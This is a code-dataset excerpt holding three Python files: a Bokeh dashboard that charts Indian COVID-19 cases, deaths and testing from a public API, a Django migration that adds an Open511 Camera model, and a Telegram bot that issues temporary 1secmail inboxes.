x_axis_type=\"datetime\", sizing_mode=\"scale_both\")\nq.title.text='Statewise Deaths over Time'\nq.title.align='center'\nq.title.text_font_size='17px'\nq.xaxis.axis_label = 'Date'\nq.yaxis.axis_label = 'Number of Deaths'\n\nfor name, color in zip(cases_summary['loc'].unique(), itertools.cycle(Spectral11)):\n cases_summary['day'] = pd.to_datetime(cases_summary['day'])\n renderer=q.line(cases_summary[cases_summary['loc']==name]['day'], cases_summary[cases_summary['loc']==name]['deaths'], line_width=2, color=color, alpha=1,\n muted_alpha=0.2)\n\n renderer.visible = False\n\n legend_it.append((name, [renderer]))\n\nlegend1=Legend(items=legend_it[0:16], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\nlegend2=Legend(items=legend_it[17:33], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\n\nq.add_layout(legend1,'right')\nq.add_layout(legend2,'right')\n\ncases_summary['day']=cases_summary['day'].astype('str')\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('Date', '@x{%F}'),\n ('Deaths', '@y{0000}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\nq.add_tools(hover)\n\ncitation = Label(x=0, y=0, x_units='screen', y_units='screen',\n text='Last Updated : {}'.format(latest_date), render_mode='css', text_font_size='12px')\nq.add_layout(citation, 'above')\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nfig = column(q,div, sizing_mode='scale_both')\n\n\ntab2 = Panel(child=fig, title=\"All Deaths - Statewise\")\n\n#statewise case-to-death ratio over time\n\nlegend_it=[]\n\ns = figure(plot_width=1200, plot_height=600, x_axis_type=\"datetime\", sizing_mode=\"scale_both\")\ns.title.text='Statewise Case-to-Death Ratio over Time'\ns.title.align='center'\ns.title.text_font_size='17px'\ns.xaxis.axis_label = 'Date'\ns.yaxis.axis_label = 'Case-to-Death Ratio'\n\ncases_summary['case-death-ratio']=cases_summary['totalConfirmed']/cases_summary['deaths']\ncases_summary['case-death-ratio']=cases_summary['case-death-ratio'].replace(np.inf,0)\ncases_summary['case-death-ratio']=cases_summary['case-death-ratio'].replace(np.nan,0)\n\n\nfor name, color in zip(cases_summary['loc'].unique(), itertools.cycle(Spectral11)):\n cases_summary['day'] = pd.to_datetime(cases_summary['day'])\n renderer=s.line(cases_summary[cases_summary['loc']==name]['day'], cases_summary[cases_summary['loc']==name]['case-death-ratio'], line_width=2, color=color, alpha=1,\n muted_alpha=0.2)\n\n renderer.visible = False\n\n legend_it.append((name, [renderer]))\n\nlegend1=Legend(items=legend_it[0:16], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\nlegend2=Legend(items=legend_it[17:33], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\n\ns.add_layout(legend1,'right')\ns.add_layout(legend2,'right')\n\ncases_summary['day']=cases_summary['day'].astype('str')\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('Date', '@x{%F}'),\n ('Case-to-death Ratio', '@y{000.000}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\ns.add_tools(hover)\n\ncitation = Label(x=0, y=0, x_units='screen', y_units='screen',\n text='Last Updated : {}'.format(latest_date), render_mode='css', text_font_size='12px')\ns.add_layout(citation, 'above')\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nfig = column(s,div, sizing_mode='scale_both')\n\n\ntab3 = Panel(child=fig, title=\"Cases-to-Death Ratio over Time - Statewise\" )\n\n#comparison of states for case-to-death ratio on the latest date\n\ncases_summary['case-death-ratio']=cases_summary['case-death-ratio'].replace(np.inf,0)\ncases_summary['case-death-ratio']=cases_summary['case-death-ratio'].replace(np.nan,0)\n\ncases_summary_latest_date=cases_summary[cases_summary['day']==latest_date][['loc','case-death-ratio']].reset_index()\nhighest_case_death_ratio_state=cases_summary_latest_date[cases_summary_latest_date['case-death-ratio']==cases_summary_latest_date['case-death-ratio'].max()]['loc'].tolist()[0]\n\nsource=ColumnDataSource(cases_summary_latest_date)\n\nt = figure(x_range=cases_summary_latest_date['loc'],plot_width=1200, plot_height=700, sizing_mode=\"scale_both\")\nt.title.text='Statewise Case-to-Death Ratio'\nt.title.align='center'\nt.title.text_font_size='17px'\nt.xaxis.axis_label = 'States'\nt.yaxis.axis_label = 'Case-to-Death ratio'\nt.xaxis.major_label_orientation = math.pi/2\n\n#top_states=cases_summary['case-death-ratio'].sort_values(ascending=False)['loc']\n\nt.vbar(cases_summary_latest_date['loc'],top=cases_summary_latest_date['case-death-ratio'], width=0.9, color=[color for name, color in zip(cases_summary_latest_date['loc'], itertools.cycle(Spectral11))])\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('State', '@x'),\n ('Case-to-Death ratio', '@top') # @$name gives the value corresponding to the legend\n]\nt.add_tools(hover)\n\ndiv1 = Div(text=\"\"\"Latest Date: {}

\n Total Cases: {:,}
\n Total Deaths: {:,}
\n Total Recovered: {:,}

\n {} has {:,} cases with the highest number of cases per death: {:.2f}

\n {} has the highest number of cases of {:,} with {:.2f} cases per death. \"\"\"\n .format(latest_date,cases_summary[cases_summary['day']==latest_date]['totalConfirmed'].sum(),\n cases_summary[cases_summary['day']==latest_date]['deaths'].sum(),\n cases_summary[cases_summary['day']==latest_date]['discharged'].sum(),\n highest_case_death_ratio_state,\n cases_summary[cases_summary['loc']==highest_case_death_ratio_state]['totalConfirmed'][-1:].tolist()[0],\n cases_summary_latest_date['case-death-ratio'].max(),\n highest_state,\n cases_summary[cases_summary['loc']==highest_state]['totalConfirmed'][-1:].tolist()[0],\n cases_summary_latest_date[cases_summary_latest_date['loc']==highest_state]['case-death-ratio'].tolist()[0]),\nwidth=200, height=280)\n\ndiv2=Div(text=\"\"\"Top 6 states with highest cases per death:
{}
{}
{}
{}
{}
{}
\"\"\"\n .format(cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[0],\n cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[1],\n cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[2],\n cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[3],\n cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[4],\n cases_summary_latest_date.sort_values('case-death-ratio',ascending=False)['loc'].head(6).tolist()[5]),\n width=200, height=200)\n\nlayout = column(div1, div2)\nlayout= row(t,layout)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\n\ntab4 = Panel(child=layout, title=\"Case-to-Death Ratio - Statewise\" )\n\n\n#Deceased data from cases summary\ncases_summary = requests.get('https://api.rootnet.in/covid19-in/stats/history')\njson_data = cases_summary.json()\ncases_summary=pd.json_normalize(json_data['data'])\ncases_summary.columns=cases_summary.columns.str.replace('summary.','')\n\ncases_summary['daily deaths']=cases_summary['deaths'].diff(1)\ncases_summary['daily confirmed']=cases_summary['total'].diff(1)\ncases_summary['daily discharged']=cases_summary['discharged'].diff(1)\n\n#Total cases over time\ncases_summary['day'] =cases_summary['day'].astype('str')\nu = figure(x_range=cases_summary['day'], plot_width=1200, plot_height=700, sizing_mode=\"scale_both\")\nu.title.text='Cases over Time - Daily'\nu.title.align='center'\nu.title.text_font_size='17px'\nu.xaxis.axis_label = 'Date'\nu.yaxis.axis_label = 'Cases'\nu.xaxis.major_label_orientation = math.pi/2\n\ntotal_bar=u.vbar(cases_summary['day'], top=cases_summary['daily confirmed'], width=0.9, legend_label='Daily Confirmed', color='#5e4fa2')\ndischarged_bar=u.vbar(cases_summary['day'], top=cases_summary['daily discharged'], width=0.9, legend_label='Daily Recovered', color='#66c2a5')\ndeceased_bar=u.vbar(cases_summary['day'], top=cases_summary['daily deaths'], width=0.9, legend_label='Daily Deaths', color='#3288bd')\n\nhover_total_bar = HoverTool(line_policy='next', renderers=[total_bar])\nhover_total_bar.tooltips = [('Day', '@x'),\n ('Daily Cases', '@top') # @$name gives the value corresponding to the legend\n]\n\nhover_deceased_bar = HoverTool(line_policy='next', renderers=[deceased_bar])\nhover_deceased_bar.tooltips = [('Day', '@x'),\n ('Daily Deaths', '@top') # @$name gives the value corresponding to the legend\n]\n\nhover_discharged_bar = HoverTool(line_policy='next', renderers=[discharged_bar])\nhover_discharged_bar.tooltips = [('Day', '@x'),\n ('Daily Recovered', '@top') # @$name gives the value corresponding to the legend\n]\n\nu.add_tools(hover_total_bar)\nu.add_tools(hover_deceased_bar)\nu.add_tools(hover_discharged_bar)\n\nu.legend.location='top_left'\nu.legend.click_policy='hide'\nu.legend.title='Click to Switch Legend ON/OFF'\n\ntotal_bar.visible=False\ndeceased_bar.visible=False\ndischarged_bar.visible=False\n\ndiv = Div(text=\"\"\"Latest Date: {}

\n Total Cases: {:,}
\n Total Deaths: {:,}
\n Total Recovered: {:,}

\n Fatality Rate: {:.2%}
\n Recovery Rate: {:.2%}

\n Important Dates:

\n {}:
The highest number of cases - {:,}

\n {}:
The highest number of deaths - {:,}

\n {}:
The highest number of Recovery - {:,} \"\"\"\n .format(latest_date,\n cases_summary.iloc[-1]['total'],\n cases_summary.iloc[-1]['deaths'],\n cases_summary.iloc[-1]['discharged'],\n (cases_summary['deaths'][-1:]/cases_summary['total'][-1:]).tolist()[0],\n (cases_summary['discharged'][-1:]/cases_summary['total'][-1:]).tolist()[0],\n cases_summary[cases_summary['daily confirmed']==cases_summary['daily confirmed'].max()]['day'].tolist()[0],\n cases_summary['daily confirmed'].max().astype('int64'),\n cases_summary[cases_summary['daily deaths']==cases_summary['daily deaths'].max()]['day'].tolist()[0],\n cases_summary['daily deaths'].max().astype('int64'),\n cases_summary[cases_summary['daily discharged'] == cases_summary['daily discharged'].max()]['day'].tolist()[0],\n cases_summary['daily discharged'].max().astype('int64')),\nwidth=200, height=100)\nlayout = row(u, div)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\ntab5 = Panel(child=layout, title=\"Total Cases over Time\" )\n\n\n#daily growth rate in cases and deaths\ncases_summary['daily_case_growth']=cases_summary['total'].pct_change()\ncases_summary['daily_death_growth']=cases_summary['deaths'].pct_change()\ncases_summary['daily_discharge_growth']=cases_summary['discharged'].pct_change()\n\n\ncases_summary['day'] = cases_summary['day'].astype('str')\nv = figure(x_range= cases_summary['day'], plot_width=1200, plot_height=700, sizing_mode=\"scale_both\")\nv.title.text='Growth Rate over Time - All India'\nv.title.align='center'\nv.title.text_font_size='17px'\nv.xaxis.axis_label = 'Date'\nv.yaxis.axis_label = 'Growth Rate'\nv.xaxis.major_label_orientation = math.pi/2\n\ncase_growth_line=v.line(cases_summary['day'], cases_summary['total'].pct_change(), line_width=2, legend_label='Daily Case Growth Rate', color='#5e4fa2')\ndeath_growth_line=v.line(cases_summary['day'],cases_summary['deaths'].pct_change(), line_width=2, legend_label='Daily Deceased Growth Rate', color='#3288bd')\ndischarge_growth_line=v.line(cases_summary['day'],cases_summary['discharged'].pct_change(), line_width=2, legend_label='Daily Recovered Growth Rate', color='#66c2a5')\n\ncases_summary['day'] = cases_summary['day'].astype('str')\nhover_case_growth = HoverTool(line_policy='next', renderers=[case_growth_line])\nhover_case_growth.tooltips = [('Day', '@x'),\n ('Daily Cases Growth Rate', '@y{0:.0%}') # @$name gives the value corresponding to the legend\n]\n\nhover_death_growth = HoverTool(line_policy='next', renderers=[death_growth_line])\nhover_death_growth.tooltips = [('Day', '@x{%F}'),\n ('Daily Deceased Growth Rate', '@y{0:.0%}') # @$name gives the value corresponding to the legend\n]\n\nhover_discharge_growth = HoverTool(line_policy='next', renderers=[discharge_growth_line])\nhover_discharge_growth.tooltips = [('Day', '@x{%F}'),\n ('Daily Recovered Growth Rate', '@y{0:.0%}') # @$name gives the value corresponding to the legend\n]\n\nhover_death_growth.formatters = {'@x': 'datetime'}\nhover_case_growth.formatters = {'@x': 'datetime'}\nhover_discharge_growth.formatters = {'@x': 'datetime'}\n\nv.add_tools(hover_case_growth)\nv.add_tools(hover_death_growth)\nv.add_tools(hover_discharge_growth)\n\nv.legend.location='top_right'\nv.legend.click_policy='hide'\nv.legend.title='Click to Switch Legend ON/OFF'\n\ncase_growth_line.visible=False\ndeath_growth_line.visible=False\ndischarge_growth_line.visible=False\n\ndiv = Div(text=\"\"\"Latest Date: {}
Total Cases: {:,}
Total Deaths: {:,}

Latest Case Growth Rate: {:.2%}
Latest Death Growth Rate: {:.2%}
Latest Revovered Growth Rate: {:.2%}

\n Fatality Rate: {:.2%}
\n Recovery Rate: {:.2%}\"\"\"\n .format(latest_date,cases_summary.iloc[-1]['total'],cases_summary.iloc[-1]['deaths'],cases_summary.iloc[-1]['daily_case_growth'],cases_summary.iloc[-1]['daily_death_growth'],cases_summary.iloc[-1]['daily_discharge_growth'],\n (cases_summary['deaths'][-1:] / cases_summary['total'][-1:]).tolist()[0], (cases_summary['discharged'][-1:]/cases_summary['total'][-1:]).tolist()[0] ),\nwidth=200, height=100)\nlayout = row(v, div)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\ntab6 = Panel(child=layout, title=\"Growth Rate over Time\" )\n\n\n#Daily cases growth rate - statewise\n\ncases_summary = requests.get('https://api.rootnet.in/covid19-in/stats/history')\njson_data = cases_summary.json()\ncases_summary=pd.json_normalize(json_data['data'], record_path='regional', meta='day')\ncases_summary['loc']=np.where(cases_summary['loc']=='Nagaland#', 'Nagaland', cases_summary['loc'])\n\nlegend_it=[]\n\nw = figure(plot_width=1200, plot_height=600, x_axis_type=\"datetime\", sizing_mode=\"scale_both\")\nw.title.text='Case Growth Rate'\nw.title.align='center'\nw.title.text_font_size='17px'\nw.xaxis.axis_label = 'Date'\nw.yaxis.axis_label = 'Cases Growth Rate'\n\ncases_summary['daily_case_growth']=cases_summary['totalConfirmed'].groupby(cases_summary['loc']).pct_change()\ncases_summary['daily_death_growth']=cases_summary['deaths'].groupby(cases_summary['loc']).pct_change()\ncases_summary['daily_case_growth']=cases_summary['discharged'].groupby(cases_summary['loc']).pct_change()\n\n\nfor name, color in zip(cases_summary['loc'].unique(), itertools.cycle(Spectral11)):\n cases_summary['day'] = pd.to_datetime(cases_summary['day'])\n renderer=w.line(cases_summary[cases_summary['loc']==name]['day'], cases_summary[cases_summary['loc']==name]['totalConfirmed'].pct_change(), line_width=2, color=color, alpha=1,\n muted_alpha=0.2)\n\n renderer.visible = False\n\n check_negative_growth = lambda name: name + '*' if (\n (cases_summary[cases_summary['loc'] == name]['totalConfirmed'].pct_change() < 0).any()) else name\n legend_it.append((check_negative_growth(name), [renderer]))\n\nlegend1=Legend(items=legend_it[0:16], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\nlegend2=Legend(items=legend_it[17:33], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\n\nw.add_layout(legend1,'right')\nw.add_layout(legend2,'right')\n\ncases_summary['day']=cases_summary['day'].astype('str')\nsource=ColumnDataSource(cases_summary)\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('Date', '@x{%F}'),\n ('All Cases Growth Rate', '@y{0:.0%}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\nw.add_tools(hover)\n\n\ndiv1 = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=700, height=50, align='start')\n\ndiv2 = Div(text=\"\"\"* States with Data Corrected implied through negative growth on a particular date on the timescale\"\"\",\nwidth=700, height=100, align='end')\n\nlayout = column(w, row(div1,div2), sizing_mode='scale_both')\n\ntab7 = Panel(child=layout, title=\"Cases Growth Rate - Statewise\")\n\n#Daily death growth rate- statewise\n\nlegend_it=[]\n\nx = figure(plot_width=1200, plot_height=600, x_axis_type=\"datetime\", sizing_mode=\"scale_both\")\nx.title.text='Fatality Growth Rate'\nx.title.align='center'\nx.title.text_font_size='17px'\nx.xaxis.axis_label = 'Date'\nx.yaxis.axis_label = 'Fatality Growth Rate'\n\ncases_summary['daily_case_growth']=cases_summary['totalConfirmed'].groupby(cases_summary['loc']).pct_change()\ncases_summary['daily_death_growth']=cases_summary['deaths'].groupby(cases_summary['loc']).pct_change()\ncases_summary['daily_case_growth']=cases_summary['discharged'].groupby(cases_summary['loc']).pct_change()\n\nfor name, color in zip(cases_summary['loc'].unique(), itertools.cycle(Spectral11)):\n cases_summary['day'] = pd.to_datetime(cases_summary['day'])\n renderer=x.line(cases_summary[cases_summary['loc']==name]['day'], cases_summary[cases_summary['loc']==name]['deaths'].pct_change(), line_width=2, color=color, alpha=1,\n muted_alpha=0.2)\n\n renderer.visible = False\n\n check_negative_growth = lambda name: name + '*' if (\n (cases_summary[cases_summary['loc'] == name]['deaths'].pct_change() < 0).any()) else name\n legend_it.append((check_negative_growth(name), [renderer]))\n\n\nlegend1=Legend(items=legend_it[0:16], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\nlegend2=Legend(items=legend_it[17:33], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\n\nx.add_layout(legend1,'right')\nx.add_layout(legend2,'right')\n\ncases_summary['day']=cases_summary['day'].astype('str')\nsource=ColumnDataSource(cases_summary)\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('Date', '@x{%F}'),\n ('Fatality Growth Rate', '@y{0:.0%}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\nx.add_tools(hover)\n\ndiv1 = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=700, height=50, align='start')\n\ndiv2 = Div(text=\"\"\"* States with Data Corrected implied through negative growth on a particular date on the timescale\"\"\",\nwidth=700, height=100, align='end')\n\nlayout = column(x, row(div1,div2), sizing_mode='scale_both')\n\ntab8 = Panel(child=layout, title=\"Fatality Growth Rate - Statewise\")\n\n#Total Tests done over time\n\ncases_tests=requests.get('https://api.rootnet.in/covid19-in/stats/testing/raw')\njson_data=cases_tests.json()\ncases_tests=pd.json_normalize(data=json_data['data'])\n\ncases_tests['timestamp']=pd.to_datetime(cases_tests['timestamp'], format=r'%Y-%m-%d')\ncases_tests['timestamp']=cases_tests['timestamp'].dt.date\n\ncases_tests['timestamp']=pd.to_datetime(cases_tests['timestamp'], format=r'%Y-%m-%d')\nsource=ColumnDataSource(cases_tests)\ny = figure(plot_width=1200, plot_height=700,sizing_mode=\"scale_both\", x_axis_type='datetime')\ny.title.text='COVID19 Tests over Time'\ny.title.align='center'\ny.title.text_font_size='17px'\ny.xaxis.axis_label = 'Date'\ny.yaxis.axis_label = 'Tests Count'\n\nsample_test=y.vbar(x=cases_tests['timestamp'], bottom=cases_tests['totalSamplesTested'], width=timedelta(days=0.5), color='#5e4fa2', alpha=1,\n legend_label=\"Samples Tested\")\npositive_test=y.vbar(x=cases_tests['timestamp'], top=cases_summary.groupby(['day'])['totalConfirmed'].sum(), width=timedelta(days=0.5), color='#3288bd', alpha=1,\n legend_label=\"Tested Positive\")\n\nhover = HoverTool(line_policy='next', renderers=[sample_test])\nhover.tooltips = [('Date', '@x{%F}'),\n ('Tests Count', '@bottom') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\n\nhover_pos = HoverTool(line_policy='next', renderers=[positive_test])\nhover_pos.tooltips = [('Date', '@x{%F}'),\n ('Positive Count', '@top') # @$name gives the value corresponding to the legend\n]\nhover_pos.formatters = {'@x': 'datetime'}\n\ny.add_tools(hover)\ny.add_tools(hover_pos)\ny.legend.location='top_left'\n\ndiv = Div(text=\"\"\"Latest Date: {}

Total Tests: {:,}

Total Cases: {:,}
Total Deaths: {:,}\"\"\".format(latest_date,cases_tests.iloc[-1]['totalSamplesTested'].astype('int64'), cases_summary[cases_summary['day']==latest_date]['totalConfirmed'].sum(), cases_summary[cases_summary['day']==latest_date]['deaths'].sum()),\nwidth=200, height=100)\nlayout = row(y, div)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\ntab9 = Panel(child=layout, title=\"All India Tests over Time\")\n\n\n#Testing Growth Rate\ncases_tests['timestamp']=pd.to_datetime(cases_tests['timestamp'], format=r'%Y-%m-%d')\ncases_tests['daily_tests']=cases_tests['totalSamplesTested'].diff(1)\ncases_tests['daily_confirmed']=cases_tests['totalPositiveCases'].diff(1)\n\n\nz = figure(plot_width=1200, plot_height=700,sizing_mode=\"scale_both\", x_axis_type='datetime', y_range=Range1d(start=0, end=cases_tests['totalSamplesTested'].max()))\nz.title.text='COVID19 Tests Growth Rate over Time'\nz.title.align='center'\nz.title.text_font_size='17px'\nz.xaxis.axis_label = 'Date'\nz.yaxis.axis_label = 'Tests Count'\n\nz.extra_y_ranges = {'tests_growth_rate': Range1d(start=cases_tests['totalSamplesTested'].pct_change().min(), end=cases_tests['totalSamplesTested'].pct_change().max())}\nz.add_layout(LinearAxis(y_range_name='tests_growth_rate'), 'right')\n\nsample_test_growth=z.vbar(x=cases_tests['timestamp'],top=cases_tests['totalSamplesTested'].pct_change() , width=timedelta(days=0.5), color='#5e4fa2', alpha=1, y_range_name='tests_growth_rate', legend_label='Tests Growth Rate')\nsample_test=z.line(cases_tests['timestamp'], cases_tests['daily_tests'], line_width=2, color='#d53e4f', alpha=1, legend_label=\"Daily Tests Count\")\n\nhover = HoverTool(line_policy='next', renderers=[sample_test_growth])\nhover.tooltips = [('Date', '@x{%F}'),\n ('Tests Growth Rate', '@top{0.:00%}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\n\nhover_growth = HoverTool(line_policy='next', renderers=[sample_test])\nhover_growth.tooltips = [('Date', '@x{%F}'),\n ('Tests Count', '@y') # @$name gives the value corresponding to the legend\n]\nhover_growth.formatters = {'@x': 'datetime'}\n\nz.add_tools(hover)\nz.add_tools(hover_growth)\nz.legend.click_policy='hide'\nz.legend.title='Click to Switch Legend ON/OFF'\n\ndiv = Div(text=\"\"\"Latest Date: {}

Total Tests: {:,}

Total Cases: {:,}
Total Deaths: {:,}\"\"\".format(latest_date,cases_tests.iloc[-1]['totalSamplesTested'].astype('int64'), cases_summary[cases_summary['day']==latest_date]['totalConfirmed'].sum(), cases_summary[cases_summary['day']==latest_date]['deaths'].sum()),\nwidth=200, height=100)\n\nlayout = row(z, div)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\ntab10 = Panel(child=layout, title=\"All India Tests Growth Rate\")\n\n\n#Correlation between Tests Count and Confirmed Cases\n\ncases_tests_without_na=cases_tests.dropna(axis=0, how='any')\n\nfig=figure(plot_width=1200, plot_height=700,sizing_mode=\"scale_both\")\nfig.title.text='Correlation of Tests Vs Confirmed Cases'\nfig.title.align='center'\nfig.title.text_font_size='17px'\nfig.xaxis.axis_label = 'Confirmed Cases'\nfig.yaxis.axis_label = 'Tests Count'\nfig.x_range=Range1d(0,cases_tests_without_na['daily_confirmed'].max() )\n\n\nscatterplot=fig.circle(cases_tests_without_na['daily_confirmed'],cases_tests_without_na['daily_tests'], legend_label='Daily Tests Vs Confirmed Cases')\n\npar = np.polyfit(cases_tests_without_na['daily_confirmed'],cases_tests_without_na['daily_tests'], 1, full=True)\nslope=par[0][0]\nintercept=par[0][1]\ny_predicted = [slope*i + intercept for i in cases_tests_without_na['daily_confirmed']]\n\nLinearRegression = fig.line(cases_tests_without_na['daily_confirmed'],y_predicted,color='red',legend_label='y='+str(round(slope,2))+'x+'+str(round(intercept,2)))\ncorrelation=cases_tests_without_na[['daily_confirmed','daily_tests']].corr('pearson')['daily_tests'][0]\n\nhover = HoverTool(line_policy='next', renderers=[scatterplot])\nhover.tooltips = [('Confirmed Cases', '@x'),\n ('Tests Count', '@y') # @$name gives the value corresponding to the legend\n]\n\nhover_line = HoverTool(line_policy='next', renderers=[LinearRegression])\nhover_line.tooltips = [('Estimated Confirmed Cases at given rate', '@x'),\n ('Tests Count ', '@y') # @$name gives the value corresponding to the legend\n]\nfig.add_tools(hover)\nfig.add_tools(hover_line)\nfig.legend.location='top_left'\n\nlabel=Label(x=-300, y=50, x_units='screen', y_units='screen', text=\"Pearson Correlation (R\\u00b2): {:.2}\".format(correlation), render_mode='css', text_font_size='14px')\nfig.add_layout(label, 'right')\n\ndiv = Div(text=\"\"\"Latest Date: {}

\n Total Tests: {:,}
\n Total Cases: {:,}

\n Pearson Correlation (R\\u00b2): {:.2}

\"\"\"\n .format(latest_date,\n cases_tests.iloc[-1]['totalSamplesTested'].astype('int64'),\n cases_summary[cases_summary['day']==latest_date]['totalConfirmed'].sum(),\n correlation),\nwidth=200, height=100)\n\nlayout = row(fig, div)\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nlayout = column(layout,div, sizing_mode='scale_both')\n\ntab11 = Panel(child=layout, title=\"Correlation - Tests Vs Cases\")\n\ntabs = Tabs(tabs=[tab1, tab2, tab3, tab4, tab5, tab6, tab7, tab8, tab9, tab10, tab11])\n\n#output_file('Statewise Cases and Deaths-Bokeh.html')\n\nbokeh_doc.add_root(tabs)\n\n","sub_path":"Coronavirus_realtime_india.py","file_name":"Coronavirus_realtime_india.py","file_ext":"py","file_size_in_byte":32258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466918819","text":"# encoding: utf8\nfrom django.db import models, migrations\nimport open511_server.utils.xmlmodel\nimport django.contrib.gis.db.models.fields\nimport open511_server.fields\nimport open511_server.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('open511', '0002_jurisdiction'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Camera',\n fields=[\n ('created', models.DateTimeField(default=open511_server.models._now, db_index=True)),\n ('updated', models.DateTimeField(default=open511_server.models._now, db_index=True)),\n ('internal_id', models.AutoField(serialize=False, primary_key=True)),\n ('id', models.CharField(db_index=True, max_length=100, blank=True)),\n ('jurisdiction', models.ForeignKey(to='open511.Jurisdiction', to_field='internal_id')),\n ('external_url', models.URLField(db_index=True, blank=True)),\n ('xml_data', open511_server.fields.XMLField(default='')),\n ('geom', django.contrib.gis.db.models.fields.PointField(srid=4326, geography=True)),\n ],\n options={\n u'ordering': ('internal_id',),\n u'unique_together': set([('id', 'jurisdiction')]),\n u'abstract': False,\n },\n bases=(models.Model, open511_server.utils.xmlmodel.XMLModelMixin),\n ),\n ]\n","sub_path":"open511_server/migrations/0003_camera.py","file_name":"0003_camera.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"616213874","text":"import logging\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\nfrom config import API_TOKEN\r\nimport keyboard as kb\r\nfrom onesec_api import Mailbox\r\nimport json\r\nimport asyncio\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\nbot = Bot(token=API_TOKEN)\r\ndp = Dispatcher(bot)\r\n\r\n\r\n@dp.message_handler(content_types=['text'])\r\nasync def texthandler(m: types.Message):\r\n\tif m.text != '✉️ Получить почту':\r\n\t\tawait m.answer(f'Приветствую тебя, {m.from_user.mention}\\nЭтот бот создан для быстрого получения временной почты.\\nНажми на кнопу ниже 👇', reply_markup=kb.menu)\r\n\telif m.text == '✉️ Получить почту':\r\n\t\tma = Mailbox('')\r\n\t\temail = f'{ma._mailbox_}@1secmail.com'\r\n\t\tawait m.answer(f'📫 Твоя почта: {email}\\n\\nОтправляй письмо,почта проверяется автоматически, каждые 5 секунд, если придет новое письмо, мы вас об этом оповестим!\\n\\nНа 1 почту можно получить только - 1 письмо.\\n\\nРЕКОМЕНДУЕМ ПОДПИСАТСЯ НА НАШ КАНАЛ @statie')\r\n\t\twhile True:\r\n\t\t\tmb = ma.filtred_mail()\r\n\t\t\tif isinstance(mb, list):\r\n\t\t\t\tmf = ma.mailjobs('read',mb[0])\r\n\t\t\t\tjs = mf.json()\r\n\t\t\t\tfromm = js['from']\r\n\t\t\t\ttheme = js['subject']\r\n\t\t\t\tmes = js['textBody']\r\n\t\t\t\tawait m.answer(f'📩 Новое письмо:\\nОт: {fromm}\\nТема: {theme}\\nСообщение: {mes}', reply_markup=kb.menu, parse_mode='HTML')\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\t\t\tawait asyncio.sleep(5)\r\n \r\n\r\nif __name__ == '__main__':\r\n\texecutor.start_polling(dp, skip_updates=True) # Запуск","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 